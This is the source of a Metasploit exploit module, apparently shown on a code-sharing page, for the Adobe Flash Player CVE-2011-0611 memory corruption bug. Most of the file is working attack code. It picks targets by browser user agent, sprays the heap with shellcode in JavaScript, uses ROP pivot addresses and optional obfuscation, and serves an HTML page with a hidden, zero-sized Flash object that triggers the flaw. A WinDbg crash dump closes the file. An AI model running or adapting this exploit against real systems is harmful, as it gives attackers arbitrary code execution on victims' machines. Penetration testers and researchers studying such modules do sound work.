Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::RopDb

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",

17
        'Description' => %q{

18
          This module exploits a vulnerability in Adobe Flash Player that was discovered,

19
          and has been exploited actively in the wild.  By embedding a specially crafted .swf

20
          file, Adobe Flash crashes due to an invalid use of an object type, which allows

21
          attackers to overwrite a pointer in memory, and results arbitrary code execution.

22
          Please note for IE 8 targets, Java Runtime Environment must be available on the

23
          victim machine in order to work properly.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'sinn3r',

28
        ],

29
        'References' => [

30
          [ 'CVE', '2011-0611' ],

31
          [ 'OSVDB', '71686' ],

32
          [ 'BID', '47314' ],

33
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],

34
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],

35
          [ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],

36
          [ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],

37
          [ 'URL', 'http://web.archive.org/web/20110417154057/http://secunia.com:80/blog/210/' ],

38
        ],

39
        'Payload' => {

40
          'Space' => 1024,

41
          'BadChars' => "\x00",

42
        },

43
        'DefaultOptions' => {

44
          'EXITFUNC' => "process",

45
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

46
        },

47
        'Platform' => 'win',

48
        'Targets' => [

49
          [ 'Automatic', {} ],

50
          [

51
            'IE 6 on Windows XP SP3',

52
            {

53
              'Rop' => false,

54
              'Pivot' => nil, # No ROP no pivot

55
              'Offset1' => '0x01',      # For aligning the payload

56
              'Offset2' => '0x02',      # For aligning the CALL

57
              'Max1' => '0x150',     # First spray

58
              'Max2' => '0x200'      # Second spray

59
            }

60
          ],

61
          [

62
            'IE 7 on Windows XP SP3',

63
            {

64
              'Rop' => false,

65
              'Pivot' => nil, # No ROP no pivot

66
              'Offset1' => '0x01',      # For aligning the payload

67
              'Offset2' => '0x02',      # For aligning the CALL

68
              'Max1' => '0x150',     # First spray

69
              'Max2' => '0x200'      # Second spray

70
            }

71
          ],

72
          [

73
            'IE 8 on Windows XP SP3',

74
            {

75
              'Rop' => true,

76
              'Pivot' => 0x7c348b05, # XCHG EAX,ESP; RETN (MSVCR71.dll)

77
              'Offset1' => '0x5E2',     # Offset for rop+payload

78
              'Offset2' => '0x02',      # Offset to 0x11111110

79
              'Max1' => '0x250',     # First spray

80
              'Max2' => '0x200'      # Second spray

81
            }

82
          ],

83
          [

84
            'IE 7 on Windows Vista',

85
            {

86
              'Rop' => false,

87
              'Pivot' => nil, # No ROP no pivot

88
              'Offset1' => '0x01',      # For aligning the payload

89
              'Offset2' => '0x02',      # For aligning the CALL

90
              'Max1' => '0x150',     # First spray

91
              'Max2' => '0x200'      # Second spray

92
            }

93
          ],

94
          [

95
            'IE 8 on Windows 7',

96
            {

97
              'Rop' => true,

98
              'Pivot' => 0x7c348b05, # XCHG EAX,ESP; RETN (MSVCR71.dll)

99
              'Offset1' => '0x5F4',     # Offset for rop+payload

100
              'Offset2' => '0x02',      # Offset to 0x11111110

101
              'Max1' => '0x101',     # First spray

102
              'Max2' => '0x300'      # Second spray

103
            }

104
          ]

105
        ],

106
        'Privileged' => false,

107
        'DisclosureDate' => '2011-04-11',

108
        'DefaultTarget' => 0,

109
        'Notes' => {

110
          'Reliability' => UNKNOWN_RELIABILITY,

111
          'Stability' => UNKNOWN_STABILITY,

112
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

113
        }

114
      )

115
    )

116


117
    register_options(

118
      [

119
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])

120
      ], self.class

121
    )

122
  end

123


124
  def exploit

125
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-0611.swf")

126
    f = File.open(path, "rb")

127
    @trigger = f.read(f.stat.size)

128
    f.close

129
    super

130
  end

131


132
  def get_target(request)

133
    agent = request.headers['User-Agent']

134


135
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/

136
      # Windows XP SP3 + IE 6.0

137
      return targets[1]

138
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/

139
      # Windows XP SP3 + IE 7.0

140
      return targets[2]

141
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/

142
      # Windows XP SP3 + IE 8.0 + JRE6

143
      return targets[3]

144
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/

145
      # Windows Vista + IE 7

146
      return targets[4]

147
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/

148
      # Windows 7 + IE 8 + JRE6

149
      return targets[5]

150
    else

151
      return nil

152
    end

153
  end

154


155
  def on_request_uri(cli, request)

156
    # Set default target

157
    my_target = target

158


159
    # If user chooses automatic target, we choose one based on user agent

160
    if my_target.name =~ /Automatic/

161
      my_target = get_target(request)

162
      if my_target.nil?

163
        print_error("Sending 404 for unknown user-agent")

164
        send_not_found(cli)

165
        return

166
      end

167
      vprint_status("Target selected: #{my_target.name}")

168
    end

169


170
    vprint_status("URL: #{request.uri}")

171


172
    if request.uri =~ /\.swf$/

173
      # Browser requests our trigger file, why not

174
      print_status("Sending trigger SWF...")

175
      send_response(cli, @trigger, { 'Content-Type' => 'application/x-shockwave-flash' })

176
      return

177
    end

178


179
    # Targets that don't need ROP

180
    pivot = "\xb8\x0c\x0c\x0c\x0c" # MOV EAX,0x0c0c0c0c

181
    pivot << "\xff\xe0"              # JMP EAX

182
    pivot << "\x41"                  # Pad

183


184
    # Targets that need ROP

185
    if my_target['Rop']

186
      # Target Addr=0x11111110

187
      pivot =

188
        [

189
          0x0c0c0c0c,          # Padding. Value for ESP after the XCHG pivot

190
          my_target['Pivot'],  # ROP Pivot

191
          0x7c346b52,          # EAX (POP ESP; RETN)

192
        ].pack('V*')

193


194
      # Target Addr=0x0c0c0c0c

195
      p = generate_rop_payload('java', payload.encoded)

196
    else

197
      p = payload.encoded

198
    end

199


200
    arch = Rex::Arch.endian(my_target.arch)

201


202
    shellcode = Rex::Text.to_unescape(p, arch)

203
    pivot = Rex::Text.to_unescape(pivot, arch)

204


205
    # Extract string based on target

206
    if my_target.name == 'IE 8 on Windows 7'

207
      js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"

208
    elsif my_target.name == 'IE 8 on Windows XP SP3'

209
      js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"

210
    else

211
      js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"

212
    end

213


214
    randnop = rand_text_alpha(rand(100) + 1)

215
    js_nops = Rex::Text.to_unescape("\x0c" * 4)

216


217
    js = <<-JS

218
    function heap_spray(heaplib, nops, code, offset, max) {

219
      while (nops.length < 0x2000) nops += nops;

220
      var offset = nops.substring(0, offset);

221
      var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);

222
      while (shellcode.length < 0x40000) shellcode += shellcode;

223
      #{js_extract_str}

224
      heaplib.gc();

225
      for (var i=1; i<max; i++) {

226
        heaplib.alloc(block);

227
      }

228
    }

229


230
    var heap_obj = new heapLib.ie(0x20000);

231
    var #{randnop} = "#{js_nops}";

232
    var nops = unescape(#{randnop});

233
    var code = unescape("#{shellcode}");

234
    heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});

235
    var fake_pointers = unescape("#{pivot}");

236
    heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});

237
    JS

238


239
    js = heaplib(js, { :noobfu => true })

240


241
    # Javascript obfuscation is optional

242
    if datastore['OBFUSCATE']

243
      js = ::Rex::Exploitation::JSObfu.new(js)

244
      js.obfuscate(memory_sensitive: true)

245
    end

246


247
    trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"

248


249
    html = <<-EOS

250
    <html>

251
    <head>

252
    <script>

253
    #{js}

254
    </script>

255
    </head>

256
    <body>

257
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"

258
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">

259
    <param name="movie" value="#{trigger_file_name}" />

260
    <embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"

261
    pluginspage="http://www.macromedia.com/go/getflashplayer">

262
    </embed>

263
    </body>

264
    </html>

265
    EOS

266


267
    html = html.gsub(/^ {4}/, "")

268


269
    print_status("Sending HTML to...")

270
    send_response(cli, html, { 'Content-Type' => "text/html" })

271
  end

272
end

273


274
=begin

275
0:000> r

276
eax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0

277
eip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0         nv up ei pl nz na po nc

278
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202

279
Flash10o+0xd01f6:

280
100d01f6 ff5008          call    dword ptr [eax+8]    ds:0023:11111118=????????

281
0:000> dd ecx

282
01d650b0  11111110 00000000 00000000 00000000

283
01d650c0  00000000 00000000 00000000 00000000

284
01d650d0  00000000 00000000 00000000 00000000

285
01d650e0  00000000 00000000 00000000 00000000

286
01d650f0  00000000 00000000 00000000 00000000

287
01d65100  00000000 00000000 00000000 00000000

288
01d65110  00000000 00000000 00000000 00000000

289
01d65120  00000000 00000000 00000000 00000000

290


291
=end

292


293